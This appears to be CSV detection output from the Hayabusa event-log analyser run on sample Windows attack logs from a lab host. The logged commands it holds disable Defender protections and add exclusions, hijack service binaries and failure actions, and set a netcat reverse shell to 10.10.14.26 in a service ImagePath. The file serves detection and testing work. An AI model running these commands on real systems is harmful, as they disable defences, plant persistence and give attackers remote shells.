0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx 2021-10-06 19:08:33.314 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx 2021-10-06 19:08:33.362 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -HighThreatDefaultAction 6 -Force,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx 2021-10-06 19:08:33.671 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""HighThreatDefaultAction""; value=""Allow"" ParameterBinding(Set-MpPreference): name=""Force""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): 
name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx 2021-10-06 19:08:33.672 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx 2021-10-06 19:08:33.680 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx 2021-10-06 19:08:33.683 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx 2021-10-06 20:14:56.275 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:14:56.300 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -ExclusionPath c:\document\virus\,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:14:56.424 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""ExclusionPath""; value=""c:\document\virus\"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" 
ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; 
value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): 
name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:14:56.425 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added 
(PowerShell).evtx 2021-10-06 20:14:56.432 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:14:56.435 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:15:06.651 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:15:06.667 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -ExclusionExtension '.exe',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:15:06.754 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""ExclusionExtension""; value="".exe"" ParameterBinding(Set-MpPreference): 
name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:15:06.755 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): 
""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:15:06.762 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-06 20:15:06.766 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx 2021-10-07 23:52:54.848 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time"" /v FailureCommand /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x2a58 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx 2021-10-07 23:53:02.147 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc failure W32Time command= ""\""c:\Windows\system32\pentestlab.exe\"""" | Path: C:\Windows\System32\sc.exe | PID: 0xa00 | User: 
admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx
2021-10-08 00:36:23.429 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc config xboxgip binPath= ""C:\windows\system32\pentestlab.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x29cc | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx
2021-10-08 00:36:24.892 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xboxgip"" /v ImagePath /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x11b8 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx
2021-10-08 03:21:36.864 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx
2021-10-08 03:21:36.889 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-ItemProperty -path HKLM:\System\CurrentControlSet\services\xboxgip -name ImagePath -value ""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx
2021-10-08 03:21:37.136 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-ItemProperty): ""Set-ItemProperty"" ParameterBinding(Set-ItemProperty): name=""Path""; value=""HKLM:\System\CurrentControlSet\services\xboxgip"" ParameterBinding(Set-ItemProperty): name=""Name""; value=""ImagePath"" ParameterBinding(Set-ItemProperty): name=""Value""; value=""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx
2021-10-08 03:21:37.137 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx
2021-10-08 03:21:37.143 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx
